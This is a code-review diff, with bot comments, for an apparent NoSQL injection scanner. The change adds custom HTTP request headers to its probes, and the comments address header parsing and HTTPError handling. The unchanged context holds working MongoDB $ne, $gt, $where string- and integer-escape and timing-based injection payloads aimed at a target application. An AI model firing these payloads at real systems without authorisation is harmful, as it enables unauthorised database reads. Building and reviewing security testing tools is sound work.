@@ -166,6 +166,7 @@ def options():
166166 global verb
167167 global mmSelect
168168 global dbPort
169+ global requestHeaders
169170
170171 #Set default value if needed
171172 if optionSet [0 ] == False :
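Review bot: `requestHeaders` is declared global here, but the "Set default value if needed" block that follows gives it no default and none of the hunks assigns it at module level, so unless it is initialised outside this diff, `postApps()` and `getApps()` will fail with `NameError` at `urllib2.Request(appURL, body, requestHeaders)` whenever the operator never picks the header-entry option. Seed it alongside the other defaults in this block, e.g. `requestHeaders = {}`, guarded by its own `optionSet` slot the same way the existing entries are. The body of `options()` continues outside the hunk.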
@@ -299,6 +300,12 @@ def options():
299300 else :
300301 print "Invalid selection"
301302
303+ reqHeadersIn = raw_input ("Enter HTTP Request Header data in a comma separated list (i.e. header name 1,value1,header name 2,value2)\n " )
304+ reqHeadersArray = reqHeadersIn .split ("," )
305+ headerNames = reqHeadersArray [0 ::2 ]
306+ headerValues = reqHeadersArray [1 ::2 ]
307+ requestHeaders = dict (zip (headerNames , headerValues ))
308+
302309 elif select == "7" :
303310 #Unset the setting boolean since we're setting it again.
304311 optionSet [4 ] = False
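Review bot: The header parser at lines 303–307 (new side) silently drops the last name when the operator enters an odd number of fields, keeps the whitespace around each field so a name typed as ` Cookie` or a value typed as ` abc` is sent as-is, and turns a leading comma into an empty header name, which `urllib2` emits as a malformed `: value` line. It also cannot express a value that itself contains a comma, such as an `Accept` list. Strip each field, reject an odd count or an empty name with a message, and only then build the dict; whether this option should also flip an `optionSet` slot like the `elif select == "7"` branch below is not visible from the hunk.
```python
reqHeadersIn = raw_input ("Enter HTTP Request Header data in a comma separated list (i.e. header name 1,value1,header name 2,value2)\n " )
fields = [f.strip() for f in reqHeadersIn.split(",")] if reqHeadersIn.strip() else []
if len(fields) % 2 != 0 or "" in fields[0::2]:
    print "Each header name needs a value; headers not changed."
else:
    requestHeaders = dict(zip(fields[0::2], fields[1::2]))
```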
@@ -447,6 +454,7 @@ def postApps():
447454 global postData
448455 global neDict
449456 global gtDict
457+ global requestHeaders
450458 testNum = 1
451459
452460 #Verify app is working.
@@ -460,7 +468,7 @@ def postApps():
460468
461469 try :
462470 body = urllib .urlencode (postData )
463- req = urllib2 .Request (appURL ,body )
471+ req = urllib2 .Request (appURL ,body , requestHeaders )
464472 appRespCode = urllib2 .urlopen (req ).getcode ()
465473
466474 if appRespCode == 200 :
@@ -515,7 +523,7 @@ def postApps():
515523 print "Sending random parameter value..."
516524
517525 body = urllib .urlencode (postData )
518- req = urllib2 .Request (appURL ,body )
526+ req = urllib2 .Request (appURL ,body , requestHeaders )
519527 randLength = int (len (urllib2 .urlopen (req ).read ()))
520528 print "Got response length of " + str (randLength ) + "."
521529
@@ -531,7 +539,7 @@ def postApps():
531539 neDict [injOpt + "[$ne]" ] = neDict [injOpt ]
532540 del neDict [injOpt ]
533541 body = urllib .urlencode (neDict )
534- req = urllib2 .Request (appURL ,body )
542+ req = urllib2 .Request (appURL ,body , requestHeaders )
535543 if verb == "ON" :
536544 print "Testing Mongo PHP not equals associative array injection using " + str (postData ) + "..."
537545
@@ -558,7 +566,7 @@ def postApps():
558566 gtDict [injOpt + "[$gt]" ] = gtDict [injOpt ]
559567 del gtDict [injOpt ]
560568 body = urllib .urlencode (gtDict )
561- req = urllib2 .Request (appURL ,body )
569+ req = urllib2 .Request (appURL ,body , requestHeaders )
562570 if verb == "ON" :
563571 print "Testing PHP/ExpressJS >Undefined Injection using " + str (postData ) + "..."
564572
@@ -574,7 +582,7 @@ def postApps():
574582
575583 postData .update ({injOpt :"a'; return db.a.find(); var dummy='!" })
576584 body = urllib .urlencode (postData )
577- req = urllib2 .Request (appURL ,body )
585+ req = urllib2 .Request (appURL ,body , requestHeaders )
578586 if verb == "ON" :
579587 print "Testing Mongo <2.4 $where all Javascript string escape attack for all records...\n "
580588 print "Injecting " + str (postData )
@@ -595,7 +603,7 @@ def postApps():
595603
596604 postData .update ({injOpt :"1; return db.a.find(); var dummy=1" })
597605 body = urllib .urlencode (postData )
598- req = urllib2 .Request (appURL ,body )
606+ req = urllib2 .Request (appURL ,body , requestHeaders )
599607 if verb == "ON" :
600608 print "Testing Mongo <2.4 $where Javascript integer escape attack for all records...\n "
601609 print "Injecting " + str (postData )
@@ -615,7 +623,7 @@ def postApps():
615623 #Start a single record attack in case the app expects only one record back
616624 postData .update ({injOpt :"a'; return db.a.findOne(); var dummy='!" })
617625 body = urllib .urlencode (postData )
618- req = urllib2 .Request (appURL ,body )
626+ req = urllib2 .Request (appURL ,body , requestHeaders )
619627 if verb == "ON" :
620628 print "Testing Mongo <2.4 $where all Javascript string escape attack for one record...\n "
621629 print " Injecting " + str (postData )
@@ -636,7 +644,7 @@ def postApps():
636644
637645 postData .update ({injOpt :"1; return db.a.findOne(); var dummy=1" })
638646 body = urllib .urlencode (postData )
639- req = urllib2 .Request (appURL ,body )
647+ req = urllib2 .Request (appURL ,body , requestHeaders )
640648 if verb == "ON" :
641649 print "Testing Mongo <2.4 $where Javascript integer escape attack for one record...\n "
642650 print " Injecting " + str (postData )
@@ -657,7 +665,7 @@ def postApps():
657665
658666 postData .update ({injOpt :"a'; return this.a != '" + injectString + "'; var dummy='!" })
659667 body = urllib .urlencode (postData )
660- req = urllib2 .Request (appURL ,body )
668+ req = urllib2 .Request (appURL ,body , requestHeaders )
661669
662670 if verb == "ON" :
663671 print "Testing Mongo this not equals string escape attack for all records..."
@@ -678,7 +686,7 @@ def postApps():
678686
679687 postData .update ({injOpt :"1; return this.a != '" + injectString + "'; var dummy=1" })
680688 body = urllib .urlencode (postData )
681- req = urllib2 .Request (appURL ,body )
689+ req = urllib2 .Request (appURL ,body , requestHeaders )
682690
683691 if verb == "ON" :
684692 print "Testing Mongo this not equals integer escape attack for all records..."
@@ -812,6 +820,7 @@ def getApps():
812820 str24 = False
813821 global int24
814822 int24 = False
823+ global requestHeaders
815824
816825 #Verify app is working.
817826 print "Checking to see if site at " + str (victim ) + ":" + str (webPort ) + str (uri ) + " is up..."
@@ -822,10 +831,11 @@ def getApps():
822831 elif https == "ON" :
823832 appURL = "https://" + str (victim ) + ":" + str (webPort ) + str (uri )
824833 try :
825- appRespCode = urllib .urlopen (appURL ).getcode ()
834+ req = urllib2 .Request (appURL , None , requestHeaders )
835+ appRespCode = urllib2 .urlopen (req ).getcode ()
826836 if appRespCode == 200 :
827- normLength = int (len (urllib .urlopen (appURL ).read ()))
828- timeReq = urllib .urlopen (appURL )
837+ normLength = int (len (urllib2 .urlopen (req ).read ()))
838+ timeReq = urllib2 .urlopen (req )
829839 start = time .time ()
830840 page = timeReq .read ()
831841 end = time .time ()
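Review bot: `urllib2.urlopen` at line 835 (new side) raises `urllib2.HTTPError` for every non-2xx status, whereas the `urllib.urlopen` it replaces returned the response, so `appRespCode` is only assigned on success and the `if appRespCode == 200:` test on the next line can no longer see a 4xx/5xx; the `except` for this `try` is outside the hunk and should now catch `urllib2.HTTPError` (its `code` attribute carries the status). The same switch in the `errorTest(...)` hunks for Tests 1–8 and the two timing-attack hunks below is more consequential: an application error page used to be handed to `errorTest` as a body and now aborts the run with an uncaught exception. `HTTPError` is file-like, so wrap each fetch as `try: page = urllib2.urlopen(req).read()` / `except urllib2.HTTPError as e: page = e.read()` and call `errorCheck = errorTest(str(page), testNum)`, which also lets the `injLen` read reuse `page` instead of opening the request a second time. `getApps()` begins and ends outside these hunks, and `errorTest` itself is not visible.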
@@ -853,13 +863,15 @@ def getApps():
853863 #Build a random string and insert; if the app handles input correctly, a random string and injected code should be treated the same.
854864 #Add error handling for Non-200 HTTP response codes if random strings freaks out the app.
855865 randomUri = buildUri (appURL ,injectString )
866+ print "URI : " + randomUri
867+ req = urllib2 .Request (randomUri , None , requestHeaders )
856868
857869 if verb == "ON" :
858870 print "Checking random injected parameter HTTP response size using " + randomUri + "...\n "
859871 else :
860872 print "Sending random parameter value..."
861873
862- randLength = int (len (urllib .urlopen (randomUri ).read ()))
874+ randLength = int (len (urllib2 .urlopen (req ).read ()))
863875 print "Got response length of " + str (randLength ) + "."
864876 randNormDelta = abs (normLength - randLength )
865877
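Review bot: The new `print "URI : " + randomUri` at line 866 (new side) reads like a leftover debug line: it is unconditional while every neighbouring status message is gated on `verb == "ON"`, and the verbose branch two lines below already prints the same URI. Drop it, or fold it under the `verb == "ON"` check.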
@@ -874,10 +886,11 @@ def getApps():
874886 print "Test 1: PHP/ExpressJS != associative array injection"
875887
876888 #Test for errors returned by injection
877- errorCheck = errorTest (str (urllib .urlopen (uriArray [1 ]).read ()),testNum )
889+ req = urllib2 .Request (uriArray [1 ], None , requestHeaders )
890+ errorCheck = errorTest (str (urllib2 .urlopen (req ).read ()),testNum )
878891
879892 if errorCheck == False :
880- injLen = int (len (urllib .urlopen (uriArray [ 1 ] ).read ()))
893+ injLen = int (len (urllib2 .urlopen (req ).read ()))
881894 checkResult (randLength ,injLen ,testNum )
882895 testNum += 1
883896 else :
@@ -890,12 +903,12 @@ def getApps():
890903 else :
891904 print "Test 2: $where injection (string escape)"
892905
893-
894- errorCheck = errorTest (str (urllib .urlopen (uriArray [ 2 ] ).read ()),testNum )
906+ req = urllib2 . Request ( uriArray [ 2 ], None , requestHeaders )
907+ errorCheck = errorTest (str (urllib2 .urlopen (req ).read ()),testNum )
895908
896909
897910 if errorCheck == False :
898- injLen = int (len (urllib .urlopen (uriArray [ 2 ] ).read ()))
911+ injLen = int (len (urllib2 .urlopen (req ).read ()))
899912 checkResult (randLength ,injLen ,testNum )
900913 testNum += 1
901914
@@ -909,11 +922,12 @@ def getApps():
909922 else :
910923 print "Test 3: $where injection (integer escape)"
911924
912- errorCheck = errorTest (str (urllib .urlopen (uriArray [3 ]).read ()),testNum )
925+ req = urllib2 .Request (uriArray [3 ], None , requestHeaders )
926+ errorCheck = errorTest (str (urllib2 .urlopen (req ).read ()),testNum )
913927
914928
915929 if errorCheck == False :
916- injLen = int (len (urllib .urlopen (uriArray [ 3 ] ).read ()))
930+ injLen = int (len (urllib2 .urlopen (req ).read ()))
917931 checkResult (randLength ,injLen ,testNum )
918932 testNum += 1
919933
@@ -928,11 +942,11 @@ def getApps():
928942 else :
929943 print "Test 4: $where injection string escape (single record)"
930944
931-
932- errorCheck = errorTest (str (urllib .urlopen (uriArray [ 4 ] ).read ()),testNum )
945+ req = urllib2 . Request ( uriArray [ 4 ], None , requestHeaders )
946+ errorCheck = errorTest (str (urllib2 .urlopen (req ).read ()),testNum )
933947
934948 if errorCheck == False :
935- injLen = int (len (urllib .urlopen (uriArray [ 4 ] ).read ()))
949+ injLen = int (len (urllib2 .urlopen (req ).read ()))
936950 checkResult (randLength ,injLen ,testNum )
937951 testNum += 1
938952 else :
@@ -945,10 +959,11 @@ def getApps():
945959 else :
946960 print "Test 5: $where injection integer escape (single record)"
947961
948- errorCheck = errorTest (str (urllib .urlopen (uriArray [5 ]).read ()),testNum )
962+ req = urllib2 .Request (uriArray [5 ], None , requestHeaders )
963+ errorCheck = errorTest (str (urllib2 .urlopen (req ).read ()),testNum )
949964
950965 if errorCheck == False :
951- injLen = int (len (urllib .urlopen (uriArray [ 5 ] ).read ()))
966+ injLen = int (len (urllib2 .urlopen (req ).read ()))
952967 checkResult (randLength ,injLen ,testNum )
953968 testNum += 1
954969
@@ -962,10 +977,11 @@ def getApps():
962977 else :
963978 print "Test 6: This != injection (string escape)"
964979
965- errorCheck = errorTest (str (urllib .urlopen (uriArray [6 ]).read ()),testNum )
980+ req = urllib2 .Request (uriArray [6 ], None , requestHeaders )
981+ errorCheck = errorTest (str (urllib2 .urlopen (req ).read ()),testNum )
966982
967983 if errorCheck == False :
968- injLen = int (len (urllib .urlopen (uriArray [ 6 ] ).read ()))
984+ injLen = int (len (urllib2 .urlopen (req ).read ()))
969985 checkResult (randLength ,injLen ,testNum )
970986 testNum += 1
971987 else :
@@ -978,10 +994,11 @@ def getApps():
978994 else :
979995 print "Test 7: This != injection (integer escape)"
980996
981- errorCheck = errorTest (str (urllib .urlopen (uriArray [7 ]).read ()),testNum )
997+ req = urllib2 .Request (uriArray [7 ], None , requestHeaders )
998+ errorCheck = errorTest (str (urllib2 .urlopen (req ).read ()),testNum )
982999
9831000 if errorCheck == False :
984- injLen = int (len (urllib .urlopen (uriArray [ 7 ] ).read ()))
1001+ injLen = int (len (urllib2 .urlopen (req ).read ()))
9851002 checkResult (randLength ,injLen ,testNum )
9861003 testNum += 1
9871004 else :
@@ -995,19 +1012,21 @@ def getApps():
9951012 else :
9961013 print "Test 8: PHP/ExpressJS > Undefined Injection"
9971014
998- errorCheck = errorTest (str (urllib .urlopen (uriArray [8 ]).read ()),testNum )
1015+ req = urllib2 .Request (uriArray [8 ], None , requestHeaders )
1016+ errorCheck = errorTest (str (urllib2 .urlopen (req ).read ()),testNum )
9991017
10001018 if errorCheck == False :
1001- injLen = int (len (urllib .urlopen (uriArray [ 8 ] ).read ()))
1019+ injLen = int (len (urllib2 .urlopen (req ).read ()))
10021020 checkResult (randLength ,injLen ,testNum )
10031021 testNum += 1
10041022
10051023 doTimeAttack = raw_input ("Start timing based tests (y/n)? " )
10061024
10071025 if doTimeAttack in yes_tag :
10081026 print "Starting Javascript string escape time based injection..."
1027+ req = urllib2 .Request (uriArray [18 ], None , requestHeaders )
10091028 start = time .time ()
1010- strTimeInj = urllib .urlopen (uriArray [ 18 ] )
1029+ strTimeInj = urllib2 .urlopen (req )
10111030 page = strTimeInj .read ()
10121031 end = time .time ()
10131032 strTimeInj .close ()
@@ -1024,8 +1043,9 @@ def getApps():
10241043 strTbAttack = False
10251044
10261045 print "Starting Javascript integer escape time based injection..."
1046+ req = urllib2 .Request (uriArray [9 ], None , requestHeaders )
10271047 start = time .time ()
1028- intTimeInj = urllib .urlopen (uriArray [ 9 ] )
1048+ intTimeInj = urllib2 .urlopen (req )
10291049 page = intTimeInj .read ()
10301050 end = time .time ()
10311051 intTimeInj .close ()